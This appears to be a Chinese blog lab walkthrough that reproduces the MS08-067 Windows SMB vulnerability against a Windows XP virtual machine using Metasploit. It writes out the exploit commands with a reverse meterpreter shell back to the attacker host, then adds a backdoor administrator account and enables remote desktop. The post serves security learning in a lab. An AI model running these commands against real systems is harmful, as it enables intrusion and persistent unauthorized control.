MS08_067复现+远程控制

最新推荐文章于 2024-04-03 19:59:43 发布
最新推荐文章于 2024-04-03 19:59:43 发布
阅读量4.1w 收藏 4
点赞数 2
分类专栏: msf 文章标签: kali linux 安全漏洞 windows xp 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/119214200
版权

环境

主机ip
kali Linux192.168.252.128
Windows xp192.168.252.148

漏洞介绍

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067

Metasploit渗透测试模块

Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119

渗透


nmap -sV 192.168.252.148
msfconsole

在这里插入图片描述

search ms08_067 #搜索
use exploit/windows/smb/ms08_067_netapi #选择模块
set payload windows/meterpreter/reverse_tcp #攻击模块装载
set rhost 192.168.252.148 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set target 7 #选择对应的版本 show targets可查看版本  set target+版本序号  选择版本这里是xp英文版所以选择7
run

在这里插入图片描述
在这里插入图片描述

出现错误

在这里插入图片描述
解决
windows xp上操作
windos+R #打开运行
gpedit.msc
在这里插入图片描述
点击应用确定
在这里插入图片描述
打开服务
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
回到kali 继续运行run
在这里插入图片描述
如出现乱码chcp 65001 解决。

远程操作

在这里插入图片描述
在这里插入图片描述
这里只能查看不能操作
在这里插入图片描述

net user admin 123456 /add  #添加新用户
net localgroup administrators admin /add #将用户加入administrators组
开启远程桌面:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

在这里插入图片描述

rdesktop 192.168.252.148 #开启远程桌面,这里必须在图像化界面上

在这里插入图片描述
因为这里是xp家庭版无法开启,如果是专业版应该是可以的。

0x717866
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MS08_067漏洞详解
m0_64593235的博客
04-17 971
MS08_067漏洞详解
Kail之MSF渗透测试--MS08-067
m0_57485346的博客
02-13 1429
MS08-067
MS08-067 漏洞复现报告
Williamanddog的博客
08-29 2383
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验 证即可利用此漏洞运行任意代码。漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。.
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7228
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kalikali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
MS08_067漏洞复现
qq_41048303的博客
07-22 5450
MS08_067漏洞复现 MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。 1.漏洞复现 1.1 复现环境 靶机:windows xp sp2 IP:192.168.1.133 攻击机:kali-linux-2020.2 IP:192.168.1.131 1.2 复现流程 启动msfconsole ...
ms08-067调研加完全复现
08-25
windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
SC2_Able_visualc++_
10-04
8. **版本控制**:虽然没有明确提及,但良好的软件开发实践通常会涉及到版本控制系统,如Git,用于跟踪代码变更和协作。 为了深入理解和复现这个项目,你需要具备上述技术背景,同时还需要阅读并理解"SC2.txt"中的...
cmapss_RUL_复现 (2)
06-01
cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL_复现 (2)cmapss_RUL...
论文复现_cst复现文献_cst_
10-01
【标题】"论文复现_cst复现文献_cst_" 指的是一项基于CST(Computer Simulation Technology)软件的科研工作复现。CST是一款强大的电磁场仿真工具,广泛应用于天线设计、射频与微波工程、电磁兼容性(EMC)等领域。...
ms08_067补丁,windowsxp补丁
04-26
ms08067补丁,最近的好多病毒、木马,打过这个补丁后就可以杀了。比如:jwgkvsq.vmx
Windows Server服务 RPC 缓冲区远程溢出漏洞ms08-067复现
qq_63539335的博客
06-27 805
渗透练习:Windows Server服务 RPC 缓冲区远程溢出漏洞(ms08-067复现,nmap,msf模块利用
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
热门推荐
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
MS08-067 漏洞利用与安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1368
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
Shadow_DAI_990101的博客
09-14 3288
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口,SMB使用了NetBIOS的API。等我学会了再写吧…可以先参考如下文章MS08-067复现与简单分析漏洞考古:MS08-067详细分析。
MS08-067溢出漏洞详解
Mashuwei
12-15 2321
利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段。微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统非常之多! 一、MS08-067远程溢出漏洞简介曾经的冲击波、震荡波等大规模攻击都是由于Windo
kali的一些使用和ms08-067、ms17-010漏洞
qq_44640313的博客
08-22 515
nmap和msf用法;vm的三种连接方式;ms08-067、ms17-010的漏洞分析
使用kali对服务器进行漏洞扫描_利用ms08_067_netapi漏洞实现远程控制Windows XP sp3
weixin_29361879的博客
01-09 816
转自:CARlos_97今天闲来无事,打开Kali来了一波MS08-067-netapi的复现就是服务器服务中的漏洞可能允许远程执行代码在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。实验准备Kali虚拟机靶机:Windows XP sp3实验操作打开Kali和靶...
MS08-067漏洞分析与复现
qq_43443410的博客
07-30 2481
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据.
ms08-067漏洞复现
最新发布
07-04
MS08-067是一个著名的Windows系统安全漏洞,也称为"远程代码执行漏洞(Remote Code Execution)",主要影响的是Microsoft Windows Server 2003 SP2及以后版本、Windows XP SP3以及Windows Vista和Windows Server ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值